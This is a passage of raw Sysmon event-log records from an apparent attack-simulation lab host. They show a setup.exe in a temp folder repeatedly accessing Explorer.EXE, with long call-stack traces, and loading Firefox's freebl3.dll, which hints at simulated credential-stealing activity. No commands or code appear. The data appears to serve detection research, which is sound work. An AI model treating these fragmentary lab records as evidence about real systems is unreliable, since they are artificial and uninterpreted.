l+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64) 10341000x800000000000000014852Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.349{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64) 11241100x800000000000000014851Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:59:52.349{59A5CD1D-9457-6005-2B05-00000000A301}6900C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exeC:\Program Files\Mozilla Firefox\freebl3.dll2021-01-18 13:59:52.349 10341000x800000000000000014850Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.333{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000014849Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.333{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000014848Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.333{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64) 10341000x800000000000000014847Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.333{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64) 10341000x800000000000000014846Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.333{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000014845Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.333{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000014844Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.333{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3 10341000x800000000000000014843Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.333{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000014842Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.333{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000014841Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.333{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000014840Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.333{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64) 10341000x800000000000000014839Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.333{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64) 10341000x800000000000000014838Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.333{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64) 10341000x800000000000000014837Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.333{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64) 10341000x800000000000000014836Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.333{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64) 10341000x800000000000000014835Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.333{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64) 10341000x800000000000000014834Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
